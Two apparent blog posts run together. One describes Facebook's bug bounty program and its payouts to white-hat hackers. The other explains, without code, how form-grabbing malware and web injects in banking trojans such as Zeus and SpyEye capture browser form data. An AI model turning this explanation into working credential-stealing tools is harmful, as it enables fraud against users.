In today’s world there are dozens of big name companies being hacked every year through countless vulnerabilities in software that we all depend on. This has created a rather bleak public opinion of the term ‘hacker.’ Yet, as Facebook is clearly aware, not all hacking is bad hacking – it just depends on how you use the holes that you have exploited.
Facebook is a company that should be very concerned about cyber security, over a billion (yes, I said a billion) people around the world use this social media behemoth – meaning they have a lot of private information to keep track of. Recognizing this, Facebook started an ongoing public program back in 2011 to give hackers a chance to turn away from the dark side – albeit with a little monetary reward as incentive. They give hackers a chance to quietly report any exploits that they have found directly to Facebook in exchange for a cash bounty.
Colloquially these hackers are known as ‘white hat’ hackers, and there are surprisingly a lot of them. Facebook dished out a total of 1.3 million dollars in 2014 alone through this program, with bounties ranging from as low as $500 to as high as $30,000. Just recently, a hacker named Laxman Muthiyah discovered a way to delete a users photos through Facebook’s graphing API. Grateful for the find, Facebook gave him a whopping $12,500 for reporting it without making it public.
Despite this monetary reward, these hackers can’t be all in it for the money. By exploiting Facebook’s holes on their own or by selling them, they could surely turn a much higher profit than what Facebook is offering. Yet, the reward coupled with a sense of morality are what drive these hackers to continue to do good rather than evil.
In the growing world of cyber crime, new methods are created and used for espionage, financial theft (fraud), and even cyber warfare. The term form grabbing refers to a method of capturing web form data within browsers. It may be confusing to contrast the differences between form grabbing and traditional keylogging, but a keylogger records all individual keystrokes by hooking into the keyboard APIs or even acting as a keyboard device driver. Keylogging method will soon be replaced by advanced form grabbing techniques because a criminal interested in your credit card and bank account does not want to read countless logs of facebook conversations. Form grabbing malware logs web form submissions by recording onsubmit event functions in a web browser, which even bypasses HTTPS encryption.The method was invented in 2003 by the developer of the Berbew Trojan (http://www.symantec.com/security_response/writeup.jsp?docid=2003-071612-0251-99), but made popular by the infamous banking trojan called Zeus in 2007. The first advancement with the form grabbing module was that Zeus in the early versions had the ability to detect the form data that was grabbed and determined whether the information is useful to the cyber criminal and even the website that the data was submitted. This allows the form grabber to be more effective in stealing sensitive information. Another banking trojan, SpyEye, (which is a rival malware of Zeus) developed web injects, which “injected” forms into websites to trick the user in entering information such as pin numbers and even social security numbers. Web injects were also adopted in the later versions of Zeus and new underground markets emerged for effective web injects to many popular websites such as Ebay and PayPal.